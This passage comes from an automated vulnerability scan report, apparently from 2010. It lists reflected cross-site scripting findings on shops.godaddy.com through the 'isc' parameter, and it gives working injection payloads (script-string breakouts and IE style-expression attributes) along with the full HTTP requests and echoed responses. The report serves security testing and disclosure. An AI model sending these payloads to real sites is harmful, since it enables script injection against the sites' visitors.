var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT02C021e5995";alert(1)//7fede595aaa&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005";
var pcj_isMgr = false;
var pcj_idpredirect = "";
var pcj_ssoTargetKey = "target";
var pcj_isCart = false;
var pcj_isCmnty = false;
var pcj_cname = "ShopperId1
...[SNIP]...

3.213. http://shops.godaddy.com/Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/ [isc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/

Issue detail

The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3c77"%3balert(1)//4ff28e1f667 was submitted in the isc parameter. This input was echoed as b3c77";alert(1)//4ff28e1f667 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/?isc=GPPT03A092b3c77"%3balert(1)//4ff28e1f667&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 171242
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=bg31by45uyjgfz3fgyire0q0; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=Fruta+Planta+30+Capsules+%7c+Reduce+Weight+Fruta+Planta,%2fNetnutri-com%2fFruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944%2f?plv=false,980944|; expires=Fri, 19-Nov-2010 23:19:00 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|Fruta+Planta+30+Capsules+%7c+Reduce+Weight+Fruta+Planta,%2fNetnutri-com%2fFruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944%2f?plv=false,980944|; expires=Tue, 14-Dec-2010 23:19:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:19:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
j_url_mya="https://mya.godaddy.com/";var pcj_url_img="http://img5.wsimg.com/";var pcj_url_cmnty="http://community.godaddy.com/";var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT03A092b3c77";alert(1)//4ff28e1f667&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005";var pcj_isMgr = false;var pcj_idpredirect = "";var pcj_ssoTargetKey = "target";var pcj_isCart = false;var pcj_isCmnty = false;var pcj_cname = "ShopperId1";var
...[SNIP]...

3.214. http://shops.godaddy.com/Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/ [isc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/

Issue detail

The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 563bb"style%3d"x%3aexpression(alert(1))"c4bb47fd256 was submitted in the isc parameter. This input was echoed as 563bb"style="x:expression(alert(1))"c4bb47fd256 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/?isc=GPPT03A092563bb"style%3d"x%3aexpression(alert(1))"c4bb47fd256&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 173331
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=mq0cnx45momxjiqzprsxvxbu; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=Fruta+Planta+30+Capsules+%7c+Reduce+Weight+Fruta+Planta,%2fNetnutri-com%2fFruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944%2f?plv=false,980944|; expires=Fri, 19-Nov-2010 23:18:48 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|Fruta+Planta+30+Capsules+%7c+Reduce+Weight+Fruta+Planta,%2fNetnutri-com%2fFruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944%2f?plv=false,980944|; expires=Tue, 14-Dec-2010 23:18:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:18:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
<div style="width:222px;height:55px;" onclick="pcj_lnk('http://www.godaddy.com/default.aspx?isc=GPPT03A092563bb"style="x:expression(alert(1))"c4bb47fd256&ci=13333'); return false;" title="GoDaddy.com">
...[SNIP]...

3.215. http://shops.godaddy.com/Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/ [isc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/

Issue detail

The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ad87"style%3d"x%3aexpression(alert(1))"ef69d8537c was submitted in the isc parameter. This input was echoed as 1ad87"style="x:expression(alert(1))"ef69d8537c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/?isc=GPPT02C0211ad87"style%3d"x%3aexpression(alert(1))"ef69d8537c&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 169969
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=ge3fcjaiic3reiiglzahmw45; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=Insanity+60+Day+Total+Body+Conditioning+Program+with+Shaun+T+DVD+Boxset,%2fNicethings-Products-Ptd-Ltd%2fInsanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset%2f?plv=false,1207707|; expires=Fri, 19-Nov-2010 23:16:15 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|Insanity+60+Day+Total+Body+Conditioning+Program+with+Shaun+T+DVD+Boxset,%2fNicethings-Products-Ptd-Ltd%2fInsanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset%2f?plv=false,1207707|; expires=Tue, 14-Dec-2010 23:16:15 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:16:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
<div style="width:222px;height:55px;" onclick="pcj_lnk('http://www.godaddy.com/default.aspx?isc=GPPT02C0211ad87"style="x:expression(alert(1))"ef69d8537c&ci=13333'); return false;" title="GoDaddy.com">
...[SNIP]...

3.216. http://shops.godaddy.com/Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/ [isc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/

Issue detail

The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0893"%3balert(1)//bec5869f8e5 was submitted in the isc parameter. This input was echoed as a0893";alert(1)//bec5869f8e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/?isc=GPPT02C021a0893"%3balert(1)//bec5869f8e5&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 167989
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=h0f2ar45fmu15k45r2cwyx2i; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=Insanity+60+Day+Total+Body+Conditioning+Program+with+Shaun+T+DVD+Boxset,%2fNicethings-Products-Ptd-Ltd%2fInsanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset%2f?plv=false,1207707|; expires=Fri, 19-Nov-2010 23:16:31 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|Insanity+60+Day+Total+Body+Conditioning+Program+with+Shaun+T+DVD+Boxset,%2fNicethings-Products-Ptd-Ltd%2fInsanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset%2f?plv=false,1207707|; expires=Tue, 14-Dec-2010 23:16:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:16:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
rl_mya="https://mya.godaddy.com/";
var pcj_url_img="http://img5.wsimg.com/";
var pcj_url_cmnty="http://community.godaddy.com/";
var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT02C021a0893";alert(1)//bec5869f8e5&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005";
var pcj_isMgr = false;
var pcj_idpredirect = "";
var pcj_ssoTargetKey = "target";
var pcj_isCart = false;
var pcj_isCmnty = false;
var pcj_cname = "ShopperId1
...[SNIP]...

3.217. http://shops.godaddy.com/Preferred-Merchandizing/Litter-Lifter-Magic-Scoop/ [isc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path: